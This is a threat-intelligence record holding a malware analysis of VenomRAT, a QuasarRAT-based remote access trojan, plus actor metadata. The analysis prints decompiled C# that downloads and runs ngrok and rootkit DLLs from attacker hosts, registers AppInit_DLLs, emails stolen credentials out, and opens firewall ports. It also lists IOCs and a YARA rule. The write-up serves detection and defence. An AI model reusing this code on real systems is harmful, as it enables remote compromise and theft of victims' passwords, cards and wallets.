{ "id": "f1533ad1-9792-482e-9ae9-09aade182f2a", "created_at": "2026-04-06T00:18:33.291316Z", "updated_at": "2026-04-10T03:37:09.420974Z", "deleted_at": null, "sha1_hash": "89f7fb7b421848e7da6961809778cbdb65fd8a58", "title": "VenomRAT - new, hackforums grade, reincarnation of QuasarRAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 965250, "plain_text": "VenomRAT - new, hackforums grade, reincarnation of QuasarRAT\r\nPublished: 2020-06-22 · Archived: 2026-04-05 18:51:31 UTC\r\nIntro\r\nDuring routine hunting we stumble upon new Remote Administration Toolkit (RAT), named Venom RAT. Like with many\r\nsuch tools authors are conducting their business under false pretense of providing a tool to remotely manage your own\r\ncomputers.\r\nA one can see on a screen-shot above, this tool posses essential capabilities to manage your own computers such as\r\nKeyloger\r\nStealer\r\nUAC Bypass\r\nPassword Recovery (sealing)\r\nAll those for small price of 150$ per month.\r\nWhat we get for it? Let’s find out.\r\nTechnical Details1\r\nThis RAT is a revamped version of infamous Quasar RAT, most likely based on this fork. Following new commands where\r\nadded\r\nDoInstallVNC\r\nDoInstallRDP\r\nDoStealer\r\nDoRemoveVnc\r\nDoRemoveRdp\r\nGetVncInfo\r\nGetRdpInfo\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 1 of 9\n\nGetAllPasswords\r\nOn top of that an rootkit was added to help hide malicious software. This adds following capabilities to already extensive list\r\nof what Quasar RAT can do.\r\nRootkit hiding processes and files\r\nVNC connection\r\nRDP connection\r\nGeneric Stealer\r\nNothing particularly groundbreaking, but the way authors decide to implement it is quite shocking, as none of those\r\nextensions are part of a malware binary. Instead new executable is downloaded from hardcoded address and run\r\npublic static void Ngrok(string token)\r\n{\r\ntry\r\n{\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"rdp.bat\r\nstreamWriter.WriteLine(\"set downloadURL=http://91.134.207.16/ngrok.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"set exeFile=%TEMP%\\\\ngrok.exe\");\r\nstreamWriter.WriteLine(\"powershell (new-object System.Net.WebClient).DownloadFile('htt\r\nstreamWriter.WriteLine(\"%exeFile% authtoken \" + token);\r\nstreamWriter.WriteLine(\"%exeFile% tcp 3389 \u003e %logFile%\");\r\nstreamWriter.Close();\r\nstring fileName = Path.Combine(Path.GetTempPath(), \"rdp.bat\");\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = fileName,\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n});\r\nThread.Sleep(30000);\r\nmodule2.geturl();\r\n}\r\ncatch (Exception)\r\n{\r\n}\r\n}\r\nRootkit (dc6ce53e100795c72f4db35a8cfd9294cc564cd82c8f59468fa94c7c0cf0b0de)\r\nFollowing code is responsible for fetching and installing DLL containing a root-kit,\r\npublic static void Install(bool is64bit)\r\n{\r\nstring path = Path.Combine(Settings.DIRECTORY, Settings.SUBDIRECTORY);\r\nif (root.IsAdmin())\r\n{\r\nstring link = \"https://payloads-poison.000webhostapp.com/r77-x64.dll\";\r\nstring link2 = \"https://payloads-poison.000webhostapp.com/r77-x86.dll\";\r\nstring name = \"r77-x64.dll\";\r\nstring name2 = \"r77-x86.dll\";\r\nmodule2.download(link, name);\r\nmodule2.download(link2, name2);\r\nstring text = \"x\" + (is64bit ? 64 : 86).ToString() + \".dll\";\r\nstring text2 = Path.Combine(Path.GetTempPath(), \"$77-\" + Guid.NewGuid().ToString(\"N\")\r\nFile.Copy(Path.Combine(path, \"r77-\" + text), text2);\r\nnew FileInfo(text2).Attributes |= FileAttributes.Temporary;\r\nusing (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is\r\n{\r\nregistryKey.SetValue(\"LoadAppInit_DLLs\", 1);\r\nregistryKey.SetValue(\"RequireSignedAppInit_DLLs\", 0);\r\nregistryKey.SetValue(\"AppInit_DLLs\", text2);\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 2 of 9\n\n}\r\nstring path2 = Path.Combine(path, \"r77-x64.dll\");\r\nstring path3 = Path.Combine(path, \"r77-x86.dll\");\r\nFile.SetAttributes(path2, FileAttributes.Hidden);\r\nFile.SetAttributes(path3, FileAttributes.Hidden);\r\nreturn;\r\n}\r\nstring link3 = \"https://payloads-poison.000webhostapp.com/r77-x64.dll\";\r\nstring link4 = \"https://payloads-poison.000webhostapp.com/r77-x86.dll\";\r\nstring name3 = \"r77-x64.dll\";\r\nstring name4 = \"r77-x86.dll\";\r\nmodule2.download(link3, name3);\r\nmodule2.download(link4, name4);\r\nstring text3 = \"x\" + (is64bit ? 64 : 86).ToString() + \".dll\";\r\nstring text4 = Path.Combine(Path.GetTempPath(), \"$77-\" + Guid.NewGuid().ToString(\"N\") + \"-\" + t\r\nFile.Copy(Path.Combine(path, \"r77-\" + text3), text4);\r\nnew FileInfo(text4).Attributes |= FileAttributes.Temporary;\r\nusing (RegistryKey registryKey2 = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ?\r\n{\r\nregistryKey2.SetValue(\"LoadAppInit_DLLs\", 1);\r\nregistryKey2.SetValue(\"RequireSignedAppInit_DLLs\", 0);\r\nregistryKey2.SetValue(\"AppInit_DLLs\", text4);\r\n}\r\nstring path4 = Path.Combine(path, \"r77-x64.dll\");\r\nstring path5 = Path.Combine(path, \"r77-x86.dll\");\r\nFile.SetAttributes(path4, FileAttributes.Hidden);\r\nFile.SetAttributes(path5, FileAttributes.Hidden);\r\n}\r\nCode of this rootkit can be found on github, https://github.com/bytecode77/r77-rootkit. This rootkit will hide anything\r\n(process, files, etc) with prefix $77 hence names of running VenomRAT binaries will start with $77 this is also clearly\r\nvisible in project files, for example in .csproj which is a part of every C# project and describes its basic properties.\r\n \u003cRootNamespace\u003e$77-Venom\u003c/RootNamespace\u003e\r\n \u003cAssemblyName\u003e$77-Venom\u003c/AssemblyName\u003e\r\nIn addition to DLL being fetched from interent, 2 more binaries are extracted form resources and dropped\r\nChrome - 1bb6f045a9218bacd2c0f35f2e9fb3f0a92f5bdd7efd207b070c47707a6ae82d, a tool based on\r\nUACSilentCleanup used to bypass UAC\r\nInstall - 74f157d228b19efbe878feb76a5be3caeb1cdd11c59ee3ec9622dbd994081310, installer for r77 rootkit, will\r\nadd r77-x86.dl and r77-x64.dll into AppInit_Dlls auto-load mechanism.\r\nStealer (f053af636e8ec15d133a92aceb4187027aa7a8d4e91e8217e87155037fbdc6ef)\r\nProbably author’s own creation named by them as Velos Stealer is a very simple C# program capable of stealing fallowing\r\ndata,\r\nFiles on desktop (with extensions .doc, .docx, .txt and .log)\r\nInfo about used ftp servers from FileZilla (filezilla_recentservers.xml, filezilla_sitemanager.xml)\r\nCrypto currency wallets (BitcoinCore, Electrum, LTC, ETH, DSH, XMR, ZEC1)\r\nSaved password from browsers\r\nSaved credit card data from browsers\r\nSaved cookies from browsers\r\nCached forms auto-filled by browsers\r\nstolen data will saved into separate files ( Passwords.txt , Cookies.txt , CC.txt , Autofill.txt ) and later compressed\r\ninto Passwords.zip\r\nVNC (517e1659c9d9ee4de266b3ade2d06965b670d17082ae2c2c97b4c694bb29152a)\r\nThis file its a UltraVNC, packed with UPX and wrapped into some sort of installer. As in most cases installation will be\r\ndone intermediary ad-hoc created .bat script\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 3 of 9\n\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"dvnc.bat\"));\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"set exeFile=%TEMP%\\\\Install.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"powershell (new-object System.Net.WebClient).DownloadFile('http://91.13\r\nRDP\r\nIn order to install RDP on victims computer few scripts and binaries will be downloaded and run.\r\nHosting URL File Name SHA256 D\r\nhxxp://91.134.207[.]16/rdpinstall.exe installrdp.exe 28d7a2216d76d1420f14c4aea0cc466d49674c9c17d078d365cc346a560b79a1\r\nC\r\nt\r\nW\r\nhxxp://91.134.207[.]16/autoupdate1.exe autoupdate1.exe ba3354e03dbb64b11989acc4593d7103097083c128f3bca86bfb8776cb279001\r\nS\r\nb\r\nc\r\ni\r\nhxxp://91.134.207[.]16/autoupdate2.exe autoupdate2.exe c1bf6f0dca24c0f99e8f0998c45b5a1c21b68cb98507210a303abee7abba8b29\r\nS\r\nb\r\nc\r\ni\r\nhttp://91.134.207.16/update.exe updaterdp.exe 57aece1eeca1ac5f5ccf23bb06b30b56c7339fe434c1c33d86a9c0fa44e1cad5\r\nS\r\nc\r\ni\r\nW\r\nBefore those files will be run, some steps are taken to prepare environment, more precisely,\r\nCleanup; all files from %TEMP% are removed and processes named cmd , conhost , installrdp , installrdp ,\r\nupdaterdp , Install , winvnc are killed\r\nRemote Desktop is enabled by manipulating registry keys\r\naccess to Remote Desktop port is enabled on firewall\r\n%ProgramFiles%\\\\RDP Wrapper is added to a list of paths ignored by Windows Defender.\r\nUser Venom with password Venom is added as an administrator with ability to use Remote Desktop\r\nNgrok\r\nBoth are RDP and VNC are tunneled by ngrok.io network, in order to achieve that ngrok client is being downloaded from\r\nhxxp://91.134.207[.]16/ngrok.exe and another utility named getrdp.exe (from\r\nhxxp://91.134.207[.]16/getrdp.exe )\r\n4\r\n is used to enumerate available tunnels and send that data back to c2. getrdp.exe\r\nis a another SFX archive, this time containing curl.exe and jq.exe , both benign tools.\r\nEx-filtration\r\nAuthors decided to implement an unusual strategy of ex-filtrating stolen data, first a file is put onto FTP server using\r\nWinSCP client and later an email with a file attached is being send. Credentials needed for authorization to ftp and smtp\r\nserver are send in a command initiating data stealing.\r\nFTP ex-filtration\r\nIn the code one can find actually two function responsible for uploading data onto FTP server, one using pure powershell\r\nand other aforementioned WinSCP.com\r\nSMTP ex-filtration\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 4 of 9\n\nIn similar fashion to FTP, malware has a two function for sending emails, one relaying on powershell and second on\r\nblat.exe\r\n5\r\n, powershell method will write a script into %TEMP%\\send.ps1 .\r\nExfiltrantion via Ngrok\r\nFor both FTP and SMTP, designated way supposed to be a Ngrok tunnel, however authors don’t really understand how\r\ntunneling works and are oblivious for a fact that you need a SMTP/FTP service on a machine to be able to use it, and when\r\nyou are tunneling traffic via 3rd party service you don’t need to open any ports\r\npublic static void SendFile(string filepath, string email, string toemail, string password, string token\r\n{\r\nmodule2.fixports();\r\nmodule2.sendfuckingemail(token);\r\ntry\r\n{\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"send.ps\r\nPath.Combine(Path.GetTempPath(), \"blat.exe\");\r\nstreamWriter.WriteLine(\"$SMTPServer = 'smtp.gmail.com';\");\r\nstreamWriter.WriteLine(\"$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);\"\r\nstreamWriter.WriteLine(\"$SMTPInfo.EnableSsl = $true;\");\r\nstreamWriter.WriteLine(string.Concat(new string[]\r\n{\r\n\"$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('\",\r\nemail,\r\n\"', '\",\r\npassword,\r\n\"');\"\r\n}));\r\nstreamWriter.WriteLine(\"$ReportEmail = New-Object System.Net.Mail.MailMessage;\");\r\nstreamWriter.WriteLine(\"$ReportEmail.From = '\" + email + \"';\");\r\nstreamWriter.WriteLine(\"$ReportEmail.To.Add('\" + toemail + \"');\");\r\nstreamWriter.WriteLine(\"$ReportEmail.Subject = 'Velos Stealer Report';\");\r\nstreamWriter.WriteLine(\"$ReportEmail.Body = 'Velos Stealer report in the attachments.'\r\nstreamWriter.WriteLine(\"$ReportEmail.Attachments.Add('\" + filepath + \"');\");\r\nstreamWriter.WriteLine(\"$SMTPInfo.Send($ReportEmail);\");\r\nstreamWriter.Close();\r\nThread.Sleep(5000);\r\nstring str = Path.Combine(Path.GetTempPath(), \"send.ps1\");\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = \"cmd\",\r\nArguments = \"/k start /b powershell -ExecutionPolicy Bypass \" + str + \"; \u0026 ex\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n}).WaitForExit();\r\nThread.Sleep(40000);\r\nmodule2.killpro();\r\nModule1.cleantemp();\r\n}\r\ncatch (Exception)\r\n{\r\n}\r\n}\r\npublic static void sendfuckingftp(string token)\r\n{\r\ntry\r\n{\r\nStreamWriter streamWriter = new StreamWriter(Path.Combine(Path.GetTempPath(), \"fixftp.\r\nstreamWriter.WriteLine(\"set downloadURL=http://91.134.207.16/ngrok.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"set exeFile=%TEMP%\\\\ngrok.exe\");\r\nstreamWriter.WriteLine(\"set logFile=%TEMP%\\\\proclog.txt\");\r\nstreamWriter.WriteLine(\"powershell (new-object System.Net.WebClient).DownloadFile('%do\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 5 of 9\n\nstreamWriter.WriteLine(\"%exeFile% authtoken \" + token);\r\nstreamWriter.WriteLine(\"%exeFile% tcp 21 \u003e %logFile%\");\r\nstreamWriter.Close();\r\nstring fileName = Path.Combine(Path.GetTempPath(), \"fixftp.bat\");\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = fileName,\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n});\r\n}\r\ncatch (Exception)\r\n{\r\n}\r\n}\r\npublic static void fixports()\r\n{\r\nProcess.Start(new ProcessStartInfo\r\n{\r\nFileName = \"cmd\",\r\nArguments = \"/k start /b netsh advfirewall firewall add rule name=SMTP1 dir=in action=\r\nCreateNoWindow = true,\r\nWindowStyle = ProcessWindowStyle.Hidden,\r\nUseShellExecute = true,\r\nErrorDialog = false\r\n});\r\n....\r\nConclusion\r\nVenomRAT is yet another RAT published on hackforums, an infamous hatchery of incapable hackers-wannabes. While\r\nauthor has some interesting ideas he’s lack of programing skills and understanding of how system and networks work\r\nprevents him from fully implement it. Besides all of those shortcomings (or maybe due to them) it generates quite a buzz on\r\na forum,\r\nWhile Qusar RAT and it forks are used by few actors, including APT33, Dropping Elephant, Stone Panda, The Gorgon\r\nGroup6, it is very unlikely that this tool will be ever used by any serious threat actor.\r\nWith a price of 150$ per month doesn’t sound like an option for aspiring criminals either, however we found quite a few\r\nsamples ITW and are waiting with impatience for an upgrades that will fix all of the errors and misconceptions. For now it\r\njust an another examples of company selling malicious software under a umbrella of elaborate TOS.\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 6 of 9\n\nAnalysis Artifacts\r\nYara\r\nrule VenomRAT {\r\n meta:\r\n reference = \"https://blog.malwarelab.pl/posts/venom/\"\r\n author = \"Maciej Kotowicz, mak@malwarelab.pl\"\r\n copyright = \"MalwareLab.pl\"\r\n date = \"2020-06-10\"\r\n hash = \"7128a2488b2d0084465ca1602a844eafb191de938fc70098d86cb65d17734778\"\r\n hash = \"95cc84715a64ff8271814d69dc2c71d8ec22476a1d580d645e1a9dba625a789c\"\r\n hash = \"74cbcffcfa82c021f1ed8f403b80ea2047f4f0d9238ab31560348910b5dcbc4f\"\r\n strings:\r\n $a0 = \"[-] Unable to Create the Enviroment Variabled %windir%.\" wide\r\n $a1 = \"Velos Stealer Report \u003e\u003e %PSScript%\" wide\r\n $a2 = \"Checking if itadmin is part of Administrators Group\" wide\r\n $a3 = \"/k start /b wusa /uninstall /kb:4471332 /quiet \u0026 exit\" wide\r\n $a4 = \"[+] Waiting 5 seconds before execution.\" wide\r\n condition:\r\n 2 of them\r\n}\r\nHashes\r\nFull list of hashes can be found on our github\r\nC2 Servers\r\nFull list of hashes can be found on our github\r\n$77payload\r\nAfro\r\nApplication\r\nAYUb\r\nClient\r\nctOS_Users\r\nDiscord\r\nFatality\r\nForthack\r\nFPSBooster\r\nFriends\r\nHacked by Seliax\r\nHusky\r\nidiot\r\nIdiot\r\nJava Updater\r\nJoel\r\nLoL Checker\r\nLunar Xray\r\nMarisa\r\nMarisa1\r\nMinecraft Launcher\r\nmp4\r\nOffice04\r\nOffice05\r\nOffice1\r\nOffice2016\r\nOfficePacket004\r\nOfficeXS20\r\nOpfer\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 7 of 9\n\nOtohits\r\nPC1\r\nPrimoTest\r\nRayan\r\nREAL\r\nretarded\r\nSearch\r\nStart\r\ntest\r\nTest\r\nTest01\r\ntestme\r\nValorantChecker\r\nVenom\r\nVenom Client\r\nVenom Slave\r\nVenom Test\r\nVictimes\r\nX_Ray\r\nChrome\r\nChrome_Update\r\nZombie\r\nMutexes\r\nall mutexes can be described with following regex: VNM_MUTEX_[a-zA-Z]{18}\r\nFilenames\r\n$$77Antimalware.exe\r\n$77$test!.exe\r\n$77ashapayload.exe\r\n$77-chrome.exe\r\n$77client.exe\r\n$77Client!.exe\r\n$77Client.exe\r\n$77driverD.exe\r\n$77Java_Updater.exe\r\n$77nordvpn.exe\r\n$77-Office.exe\r\n$77Steem.exe\r\n$77TeksurnaGrafika.exe\r\n$77TestC.exe\r\n$77Test.exe\r\n$77-venom.exe\r\n$77WinSheduler.exe\r\n$77WinUpdate.exe\r\n$77-winupdater.exe\r\n$77XXX.exe\r\n$ClientRun.exe\r\nClient.exe\r\nClientuisis.exe\r\nDllhost.exe\r\nForthack.exe\r\nfSociety.exe\r\nGoogleUpdaTes.exe\r\niusnBase.exe\r\nJai.exe\r\nMicrosoft.exe\r\nMicrosoftUpdate.exe\r\nMicrosoftWindowsGrahpy.exe\r\nMUAHHA.exe\r\nOffice2016.exe\r\nofficeupdate.exe\r\nOtohits.exe\r\nruby.exe\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 8 of 9\n\nRuntimeBroker.exe\r\nSearch.exe\r\nSelf-Bot-github.exe\r\nservices.exe\r\nSuperAdmin.exe\r\nsvchost.exe\r\nTarea.exe\r\ntelegram.exe\r\nUpdater.exe\r\nVega.exe\r\nVenom.exe\r\nvenomkongregate.exe\r\nWinDefend.exe\r\nWindows Defender.exe\r\nwindowsoperator.exe\r\nWindowsUpdate.exe\r\nwinsvr.exe\r\nWndProc.exe\r\n$77Your Phone.exe\r\nAuxiliary Source\r\n$77sys.exe\r\nZ-Flix Cracked by Seliax.exe\r\n1. Analysis was performed based on a debug build\r\n( 7128a2488b2d0084465ca1602a844eafb191de938fc70098d86cb65d17734778 ) representing version 2.1.0.0, this version\r\nmatch all of them samples of this malware we found ITW ↩︎\r\n2. This feature will be added probably in next version, for now function responsible for it is empty ↩︎\r\n3. https://github.com/stascorp/rdpwrap ↩︎\r\n4. autoupdate.bat is a legitimate file, part of RDP Wrapper that will add itself as scheduled task ↩︎\r\n5. https://www.blat.net/ ↩︎\r\n6. https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat ↩︎\r\nSource: https://blog.malwarelab.pl/posts/venom/\r\nhttps://blog.malwarelab.pl/posts/venom/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.malwarelab.pl/posts/venom/" ], "report_names": [ "venom" ], "threat_actors": [ { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "ec14074c-8517-40e1-b4d7-3897f1254487", "created_at": "2023-01-06T13:46:38.300905Z", "updated_at": "2026-04-10T02:00:02.918468Z", "deleted_at": null, "main_name": "APT10", "aliases": [ "Red Apollo", "HOGFISH", "BRONZE RIVERSIDE", "G0045", "TA429", "Purple Typhoon", "STONE PANDA", "Menupass Team", "happyyongzi", "CVNX", "Cloud Hopper", "ATK41", "Granite Taurus", "POTASSIUM" ], "source_name": "MISPGALAXY:APT10", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "7ea1e0de-53b9-4059-802f-485884180701", "created_at": "2022-10-25T16:07:24.04846Z", "updated_at": "2026-04-10T02:00:04.84985Z", "deleted_at": null, "main_name": "Patchwork", "aliases": [ "APT-C-09", "ATK 11", "Capricorn Organisation", "Chinastrats", "Dropping Elephant", "G0040", "Maha Grass", "Quilted Tiger", "TG-4410", "Thirsty Gemini", "Zinc Emerson" ], "source_name": "ETDA:Patchwork", "tools": [ "AndroRAT", "Artra Downloader", "ArtraDownloader", "AutoIt backdoor", "BADNEWS", "BIRDDOG", "Bahamut", "Bozok", "Bozok RAT", "Brute Ratel", "Brute Ratel C4", "CinaRAT", "Crypta", "ForeIT", "JakyllHyde", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "NDiskMonitor", "Nadrac", "PGoShell", "PowerSploit", "PubFantacy", "Quasar RAT", "QuasarRAT", "Ragnatela", "Ragnatela RAT", "SocksBot", "TINYTYPHON", "Unknown Logger", "WSCSPL", "Yggdrasil" ], "source_id": "ETDA", "reports": null }, { "id": "ba9fa308-a29a-4928-9c06-73aafec7624c", "created_at": "2024-05-01T02:03:07.981061Z", "updated_at": "2026-04-10T02:00:03.750803Z", "deleted_at": null, "main_name": "BRONZE RIVERSIDE", "aliases": [ "APT10 ", "CTG-5938 ", "CVNX ", "Hogfish ", "MenuPass ", "MirrorFace ", "POTASSIUM ", "Purple Typhoon ", "Red Apollo ", "Stone Panda " ], "source_name": "Secureworks:BRONZE RIVERSIDE", "tools": [ "ANEL", "AsyncRAT", "ChChes", "Cobalt Strike", "HiddenFace", "LODEINFO", "PlugX", "PoisonIvy", "QuasarRAT", "QuasarRAT Loader", "RedLeaves" ], "source_id": "Secureworks", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c81067e0-9dcb-4e3f-abb0-80126519c5b6", "created_at": "2022-10-25T15:50:23.285448Z", "updated_at": "2026-04-10T02:00:05.282202Z", "deleted_at": null, "main_name": "Patchwork", "aliases": [ "Hangover Group", "Dropping Elephant", "Chinastrats", "Operation Hangover" ], "source_name": "MITRE:Patchwork", "tools": [ "NDiskMonitor", "QuasarRAT", "BackConfig", "TINYTYPHON", "AutoIt backdoor", "PowerSploit", "BADNEWS", "Unknown Logger" ], "source_id": "MITRE", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "04b07437-41bb-4126-bcbb-def16f19d7c6", "created_at": "2022-10-25T16:07:24.232628Z", "updated_at": "2026-04-10T02:00:04.906097Z", "deleted_at": null, "main_name": "Stone Panda", "aliases": [ "APT 10", "ATK 41", "Bronze Riverside", "CTG-5938", "CVNX", "Cuckoo Spear", "Earth Kasha", "G0045", "G0093", "Granite Taurus", "Happyyongzi", "Hogfish", "ITG01", "Operation A41APT", "Operation Cache Panda", "Operation ChessMaster", "Operation Cloud Hopper", "Operation Cuckoo Spear", "Operation New Battle", "Operation Soft Cell", "Operation TradeSecret", "Potassium", "Purple Typhoon", "Red Apollo", "Stone Panda", "TA429", "menuPass", "menuPass Team" ], "source_name": "ETDA:Stone Panda", "tools": [ "Agent.dhwf", "Agentemis", "Anel", "AngryRebel", "BKDR_EVILOGE", "BKDR_HGDER", "BKDR_NVICM", "BUGJUICE", "CHINACHOPPER", "ChChes", "China Chopper", "Chymine", "CinaRAT", "Cobalt Strike", "CobaltStrike", "DARKTOWN", "DESLoader", "DILLJUICE", "DILLWEED", "Darkmoon", "DelfsCake", "Derusbi", "Destroy RAT", "DestroyRAT", "Ecipekac", "Emdivi", "EvilGrab", "EvilGrab RAT", "FYAnti", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "GreetCake", "HAYMAKER", "HEAVYHAND", "HEAVYPOT", "HTran", "HUC Packet Transmit Tool", "Ham Backdoor", "HiddenFace", "Impacket", "Invoke the Hash", "KABOB", "Kaba", "Korplug", "LODEINFO", "LOLBAS", "LOLBins", "Living off the Land", "MiS-Type", "Mimikatz", "Moudour", "Mydoor", "NBTscan", "NOOPDOOR", "Newsripper", "P8RAT", "PCRat", "PlugX", "Poison Ivy", "Poldat", "PowerSploit", "PowerView", "PsExec", "PsList", "Quarks PwDump", "Quasar RAT", "QuasarRAT", "RedDelta", "RedLeaves", "Rubeus", "SNUGRIDE", "SPIVY", "SharpSploit", "SigLoader", "SinoChopper", "SodaMaster", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "UpperCut", "Vidgrab", "WinRAR", "WmiExec", "Wmonder", "Xamtrav", "Yggdrasil", "Zlib", "certutil", "certutil.exe", "cobeacon", "dfls", "lena", "nbtscan", "pivy", "poisonivy", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a", "created_at": "2022-10-25T15:50:23.298889Z", "updated_at": "2026-04-10T02:00:05.316886Z", "deleted_at": null, "main_name": "menuPass", "aliases": [ "menuPass", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE" ], "source_name": "MITRE:menuPass", "tools": [ "certutil", "FYAnti", 